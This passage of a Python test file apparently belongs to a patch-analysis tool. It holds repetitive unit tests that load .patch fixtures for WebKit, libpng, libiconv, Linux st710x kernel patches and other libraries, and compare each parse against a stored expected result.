expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/plugin_thread_async_call.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_ram_cache_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/ram_cache.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/ram_cache.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_ram_cache_meta_expires_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/ram_cache_meta_expires.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/ram_cache_meta_expires.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_speedup_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/speedup.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/speedup.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_sync_xhr_https_access_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/sync_xhr_https_access.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/sync_xhr_https_access.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_useragent_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/useragent.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/useragent.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_webcore_keyevent_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/webcore_keyevent.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/webcore_keyevent.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_webcore_videoplane_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/webcore_videoplane.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/webcore_videoplane.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_webkit_cssparser_parsetransitionshorthand_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/webkit_CSSParser_parseTransitionShorthand.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/webkit_CSSParser_parseTransitionShorthand.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_webkit_database_support_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/webkit_database_support.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/webkit_database_support.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_webkit_dlna_images_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/webkit_dlna_images.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/webkit_dlna_images.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_webkit_finish_animations_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/webkit_finish_animations.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/webkit_finish_animations.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_webkit_xmlhttprequest_cross_domain_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/webkit_xmlhttprequest_cross_domain.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/webkit_xmlhttprequest_cross_domain.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_prepatches_moto_createobject_null_check_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/prepatches/moto-createobject-null-check.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/prepatches/moto-createobject-null-check.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_prepatches_moto_dump_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/prepatches/moto-dump.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/prepatches/moto-dump.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_prepatches_moto_getopensourcenotice_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/prepatches/moto-getopensourcenotice.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/prepatches/moto-getopensourcenotice.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_prepatches_moto_jsvalue_equal_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/prepatches/moto-jsvalue-equal.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/prepatches/moto-jsvalue-equal.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_prepatches_moto_timer_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/prepatches/moto-timer.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/prepatches/moto-timer.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_prepatches_support_parallel_idl_gen_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/prepatches/support_parallel_idl_gen.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/prepatches/support_parallel_idl_gen.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_prepatches_webcore_accept_click_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/prepatches/webcore_accept_click.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/prepatches/webcore_accept_click.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_prepatches_webcore_videoplane_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/prepatches/webcore_videoplane.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/prepatches/webcore_videoplane.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_icu_patches_ekioh_config_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/icu/patches/ekioh-config.patch')
expected_file = self.get_test_loc('patch/patches/misc/icu/patches/ekioh-config.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_jfsutils_patches_largefile_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/jfsutils/patches/largefile.patch')
expected_file = self.get_test_loc('patch/patches/misc/jfsutils/patches/largefile.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_libasyncns_asyncns_h_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/libasyncns/asyncns.h.patch')
expected_file = self.get_test_loc('patch/patches/misc/libasyncns/asyncns.h.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_libasyncns_configure_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/libasyncns/configure.patch')
expected_file = self.get_test_loc('patch/patches/misc/libasyncns/configure.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_libdaemon_0_13_patches_configure_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/libdaemon-0.13/patches/configure.patch')
expected_file = self.get_test_loc('patch/patches/misc/libdaemon-0.13/patches/configure.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_libiconv_patches_cp932_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/libiconv/patches/cp932.patch')
expected_file = self.get_test_loc('patch/patches/misc/libiconv/patches/cp932.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_libiconv_patches_make_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/libiconv/patches/make.patch')
expected_file = self.get_test_loc('patch/patches/misc/libiconv/patches/make.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_libjpeg_v6b_patches_config_sub_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/libjpeg-v6b/patches/config.sub.patch')
expected_file = self.get_test_loc('patch/patches/misc/libjpeg-v6b/patches/config.sub.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_libjpeg_v6b_patches_configure_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/libjpeg-v6b/patches/configure.patch')
expected_file = self.get_test_loc('patch/patches/misc/libjpeg-v6b/patches/configure.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_libjpeg_v6b_patches_makefile_cfg_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/libjpeg-v6b/patches/makefile.cfg.patch')
expected_file = self.get_test_loc('patch/patches/misc/libjpeg-v6b/patches/makefile.cfg.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_libpng_1_2_8_makefile_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/libpng-1.2.8/makefile.patch')
expected_file = self.get_test_loc('patch/patches/misc/libpng-1.2.8/makefile.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_libpng_1_2_8_pngconf_h_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/libpng-1.2.8/pngconf.h.patch')
expected_file = self.get_test_loc('patch/patches/misc/libpng-1.2.8/pngconf.h.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_libpng_1_2_8_pngrutil_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/libpng-1.2.8/pngrutil.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/libpng-1.2.8/pngrutil.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_libxml2_patches_iconv_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/libxml2/patches/iconv.patch')
expected_file = self.get_test_loc('patch/patches/misc/libxml2/patches/iconv.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_0001_stmmac_updated_the_driver_and_added_several_fixes_a_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/0001-stmmac-updated-the-driver-and-added-several-fixes-a.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/0001-stmmac-updated-the-driver-and-added-several-fixes-a.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_addrspace_h_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/addrspace.h.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/addrspace.h.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_arch_sh_kernel_cpu_init_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/arch_sh_kernel_cpu_init.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/arch_sh_kernel_cpu_init.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_arch_sh_makefile_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/arch_sh_Makefile.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/arch_sh_Makefile.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_arch_sh_mm_init_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/arch_sh_mm_init.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/arch_sh_mm_init.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_bigphysarea_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/bigphysarea.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/bigphysarea.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_bugs_h_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/bugs.h.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/bugs.h.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_cache_sh4_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/cache-sh4.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/cache-sh4.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_cfi_cmdset_0001_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/cfi_cmdset_0001.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/cfi_cmdset_0001.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_cfi_util_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/cfi_util.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/cfi_util.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_char_build_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/char_build.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/char_build.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_cmdlinepart_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/cmdlinepart.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/cmdlinepart.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_console_printk_loglevel_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/console_printk_loglevel.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/console_printk_loglevel.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_delayed_i2c_read_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/delayed_i2c_read.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/delayed_i2c_read.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_devinet_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/devinet.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/devinet.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_disable_carrier_sense_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/disable_carrier_sense.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/disable_carrier_sense.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_disable_unaligned_printks_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/disable_unaligned_printks.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/disable_unaligned_printks.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_dma_api_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/dma-api.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/dma-api.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_do_mounts_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/do_mounts.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/do_mounts.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_drivers_net_makefile_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/drivers_net_Makefile.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/drivers_net_Makefile.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_fan_ctrl_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/fan_ctrl.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/fan_ctrl.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_hcd_stm_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/hcd_stm.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/hcd_stm.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_head_s_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/head.S.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/head.S.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_i2c_stm_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/i2c-stm.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/i2c-stm.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_i2c_stm_c_patch2(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/i2c-stm.c.patch2')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/i2c-stm.c.patch2.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_i2c_nostop_for_bitbanging_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/i2c_nostop_for_bitbanging.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/i2c_nostop_for_bitbanging.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_i2c_rate_normal_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/i2c_rate_normal.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/i2c_rate_normal.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_i2c_revert_to_117_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/i2c_revert_to_117.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/i2c_revert_to_117.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_if_ppp_h_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/if_ppp.h.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/if_ppp.h.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_inittmpfs_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/inittmpfs.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/inittmpfs.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_init_kconfig_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/init_Kconfig.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/init_Kconfig.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_init_main_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/init_main.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/init_main.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_ioremap_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/ioremap.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/ioremap.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_ipconfig_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/ipconfig.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/ipconfig.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_kernel_extable_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/kernel_extable.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/kernel_extable.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_kernel_resource_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/kernel_resource.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/kernel_resource.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_kexec_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/kexec.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/kexec.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_ksymhash_elflib_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/ksymhash_elflib.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/ksymhash_elflib.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_libata_sense_data_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/libata_sense_data.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/libata_sense_data.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_localversion_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/localversion.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/localversion.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_mach_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/mach.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/mach.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_marvell_88e3015_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/marvell_88e3015.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/marvell_88e3015.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_mb442_setup_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/mb442_setup.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/mb442_setup.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_mmu_context_h_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/mmu_context.h.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/mmu_context.h.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_motorola_make_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/motorola_make.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/motorola_make.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_motorola_rootdisk_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/motorola_rootdisk.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/motorola_rootdisk.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_namespace_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/namespace.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/namespace.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_nand_flash_based_bbt_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/nand_flash_based_bbt.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/nand_flash_based_bbt.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_nand_old_oob_layout_for_yaffs2_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/nand_old_oob_layout_for_yaffs2.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/nand_old_oob_layout_for_yaffs2.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_netconsole_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/netconsole.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/netconsole.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_netconsole_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/netconsole.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/netconsole.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_nfsroot_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/nfsroot.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/nfsroot.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_page_h_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/page.h.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/page.h.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_page_alloc_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/page_alloc.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/page_alloc.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_pgtable_h_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/pgtable.h.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/pgtable.h.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_phy_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/phy.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/phy.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_phy_h_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/phy.h.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/phy.h.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_phy_device_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/phy_device.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/phy_device.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_pid_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/pid.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/pid.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_pio_irq_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/pio-irq.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/pio-irq.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_pmb_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/pmb.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/pmb.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_process_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/process.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/process.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_sample_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/sample.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/sample.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_sched_cfs_v2_6_23_12_v24_1_mod_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/sched-cfs-v2.6.23.12-v24.1.mod.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/sched-cfs-v2.6.23.12-v24.1.mod.patch.expected')
check_patch(test_file, expected_file)
